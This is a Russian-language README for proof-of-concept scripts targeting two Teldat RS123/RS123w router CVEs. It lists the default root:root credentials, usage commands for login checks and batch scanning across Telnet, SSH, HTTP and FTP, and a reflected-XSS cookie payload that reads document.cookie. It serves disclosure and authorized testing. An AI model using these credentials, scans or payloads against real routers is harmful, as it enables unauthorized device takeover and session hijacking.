
POC для CVE-2022-39996 (Отражённый XSS) и CVE-2022-39997 (Слабый пароль) в маршрутизаторе Teldat RS123/RS123w
Доказательство концепции для двух уязвимостей, обнаруженных в маршрутизаторах Teldat RS123 / RS123w.
| CVE ID | Тип | CWE | CVSS | Серьезность |
|---|---|---|---|---|
| CVE-2022-39996 | Отраженный XSS | CWE-79 | 6.1 | Средняя |
| CVE-2022-39997 | Слабый пароль | CWE-521 | 9.8 | Критическая |
Затронутый продукт: Маршрутизаторы Teldat RS123, RS123w
Маршрутизаторы Teldat RS123/RS123w поставляются с жестко заданными учётными данными по умолчанию root:root. Администраторы часто оставляют их без изменений, что позволяет неаутентифицированным злоумышленникам получить полный административный доступ через Telnet, SSH, HTTP или другие сервисы.
Account: root
Password: root

pip install requests paramiko
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Batch scan
python CVE-2022-39997.py -f targets.txt
Конечная точка /upgrade/index.html отражает значение HTTP-куки cmd в ответе без санитизации. Злоумышленник может создать вредоносный запрос, содержащий JavaScript в куки cmd. Когда аутентифицированный администратор заходит на страницу, скрипт выполняется в контексте браузера веб-интерфейса маршрутизатора, что позволяет перехватить сессию или манипулировать конфигурацией.
cmd:

pip install requests
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1
# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| Файл | Описание |
|---|---|
CVE-2022-39997.py | Обнаружение слабого пароля (Telnet / SSH / HTTP / FTP) |
CVE-2022-39996.py | Обнаружение отраженного XSS через куки cmd |
Teldat's Router Vulnerability.md | Полный отчет о раскрытии уязвимости |
Эти POC-скрипты предназначены только для образовательного и авторизованного тестирования безопасности. Не используйте их против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несет ответственности за любое неправомерное использование или ущерб.